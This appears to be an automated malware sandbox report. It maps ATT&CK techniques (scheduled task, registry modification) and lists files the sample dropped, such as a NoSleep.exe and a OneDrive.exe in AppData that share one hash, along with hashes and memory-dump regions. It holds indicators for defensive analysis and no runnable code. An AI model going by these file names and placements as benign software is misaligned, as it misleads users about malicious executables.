MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\86X4450S.txt
Filesize
603B

MD5
05eee3fd386064332c31b76bec5b94b9

SHA1
1ecceb5a32366fa00a3f3d2971878d739f7bb9a8

SHA256
b61cf102793be833db74ef629edf0bd5f162370ad58dd2635d76383f63af2204

SHA512
eba8d17ff41036b7a9f9a3a02eb7ceb31b233ffe0b5eeaaf14824c53fe4474983843f5ae3b027a75097832c3633c942150db4b5c9eff4bb1decf311574905a45

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8c05788ad61752f961edf452a94e5730

SHA1
a686aff39e9b1f1525e3b6aab769a37f0e9bc782

SHA256
b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

SHA512
5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
1.3MB

MD5
c6783f79e545584d0e6f2bc0029db114

SHA1
7c99c0456b1845b2131869ff70ad7187c3241d8b

SHA256
f37ec25162ad07f8ee09e9a661c60e6987a5cce5fc3cb70c93b1a30c3c9cf9f3

SHA512
63ff48dfcc815e11661166409ad20134484de2f90ec9bf790bfb096dacc31f9c937cd0d08171671e4a69462cef31681bee00bcbb1381b28e25671345cadaff0d

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\Downloads\file.exe
Filesize
35KB

MD5
90481d2c6fbbe8d4ae6108d756a48d9d

SHA1
b08f7eafa5b562a09792bc2d4b11837eb82496bc

SHA256
aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

SHA512
884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

Download Submit
C:\Users\Admin\Downloads\file.exe
Filesize
35KB

MD5
90481d2c6fbbe8d4ae6108d756a48d9d

SHA1
b08f7eafa5b562a09792bc2d4b11837eb82496bc

SHA256
aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

SHA512
884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

Download Submit
C:\Users\Admin\Downloads\file.exe.invysg4.partial
Filesize
35KB

MD5
90481d2c6fbbe8d4ae6108d756a48d9d

SHA1
b08f7eafa5b562a09792bc2d4b11837eb82496bc

SHA256
aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

SHA512
884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

Download Submit
\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
memory/288-55-0x0000000000000000-mapping.dmp

Download
memory/288-57-0x0000000000F00000-0x0000000000F10000-memory.dmp

Filesize
64KB

Download
memory/440-77-0x0000000000000000-mapping.dmp

Download
memory/440-117-0x000000000224B000-0x000000000226A000-memory.dmp

Filesize
124KB

Download
memory/440-102-0x0000000002244000-0x0000000002247000-memory.dmp

Filesize
12KB

Download
memory/440-116-0x0000000002244000-0x0000000002247000-memory.dmp

Filesize
12KB

Download
memory/440-106-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/440-93-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/720-138-0x00000000022CB000-0x00000000022EA000-memory.dmp

Filesize
124KB

Download
memory/720-62-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmp

Filesize
8KB

Download
memory/720-127-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/720-137-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/720-66-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/720-89-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/720-97-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/720-122-0x00000000022CB000-0x00000000022EA000-memory.dmp

Filesize
124KB

Download
memory/720-58-0x0000000000000000-mapping.dmp

Download
memory/852-112-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/852-100-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/852-156-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/852-109-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/852-130-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/852-151-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/852-108-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/852-76-0x0000000000000000-mapping.dmp

Download
memory/852-91-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1000-73-0x0000000000080000-0x0000000000090000-memory.dmp

Filesize
64KB

Download
memory/1000-71-0x0000000000000000-mapping.dmp

Download
memory/1296-88-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1296-123-0x00000000027DB000-0x00000000027FA000-memory.dmp

Filesize
124KB

Download
memory/1296-96-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1296-111-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1296-78-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1296-121-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1296-128-0x00000000027DB000-0x00000000027FA000-memory.dmp

Filesize
124KB

Download
memory/1296-59-0x0000000000000000-mapping.dmp

Download
memory/1296-126-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1496-60-0x0000000000000000-mapping.dmp

Download
memory/1496-98-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/1496-145-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/1496-90-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1496-129-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/1496-144-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/1496-124-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/1496-68-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1612-92-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1612-74-0x0000000000000000-mapping.dmp

Download
memory/1612-131-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/1612-140-0x000000000271B000-0x000000000273A000-memory.dmp

Filesize
124KB

Download
memory/1612-125-0x000000000271B000-0x000000000273A000-memory.dmp

Filesize
124KB

Download
memory/1612-105-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1612-101-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/1612-139-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/1828-118-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1828-104-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1828-82-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1828-99-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1828-119-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1828-61-0x0000000000000000-mapping.dmp

Download
memory/1908-75-0x0000000000000000-mapping.dmp

Download
memory/1908-107-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1908-94-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1908-136-0x000000000236B000-0x000000000238A000-memory.dmp

Filesize
124KB

Download
memory/1908-103-0x0000000002364000-0x0000000002367000-memory.dmp

Filesize
12KB

Download
memory/1908-135-0x0000000002364000-0x0000000002367000-memory.dmp

Filesize
12KB

Download
memory/1908-110-0x000000001B7E0000-0x000000001BADF000-memory.dmp

Filesize
3.0MB

Download
memory/1908-113-0x000000000236B000-0x000000000238A000-memory.dmp

Filesize
124KB

Download
memory/2448-133-0x0000000000000000-mapping.dmp

Download
memory/2472-141-0x00000000001B0000-0x000000000060B000-memory.dmp

Filesize
4.4MB

Download
memory/2472-142-0x000000001B9A0000-0x000000001BDFC000-memory.dmp

Filesize
4.4MB

Download
memory/2472-143-0x000000001B540000-0x000000001B974000-memory.dmp

Filesize
4.2MB

Download
memory/2664-146-0x0000000000000000-mapping.dmp

Download
memory/2696-147-0x0000000000000000-mapping.dmp

Download
memory/2752-150-0x0000000000000000-mapping.dmp

Download
memory/2788-152-0x0000000000000000-mapping.dmp

Download
memory/2840-154-0x0000000000000000-mapping.dmp

Download
memory/2860-157-0x00000000001F0000-0x00000000001F6000-memory.dmp

Filesize
24KB

Download
memory/2924-160-0x0000000000000000-mapping.dmp

Download
memory/2924-161-0x00000000000A0000-0x00000000000B9000-memory.dmp

Filesize
100KB

Download
memory/2924-162-0x0000000000340000-0x000000000035A000-memory.dmp

Filesize
104KB

Download
memory/2924-163-0x0000000000360000-0x000000000036E000-memory.dmp

Filesize
56KB

Download
memory/2924-158-0x00000000000A0000-0x00000000000B9000-memory.dmp

Filesize
100KB

Download
memory/3008-170-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-180-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-168-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-165-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-172-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-174-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-175-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-176-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-178-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-166-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-181-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-182-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-184-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-185-0x000000014036EAC4-mapping.dmp

Download
memory/3008-187-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-188-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/3008-189-0x0000000000120000-0x0000000000140000-memory.dmp

Filesize
128KB

Download
memory/3008-190-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/3008-191-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download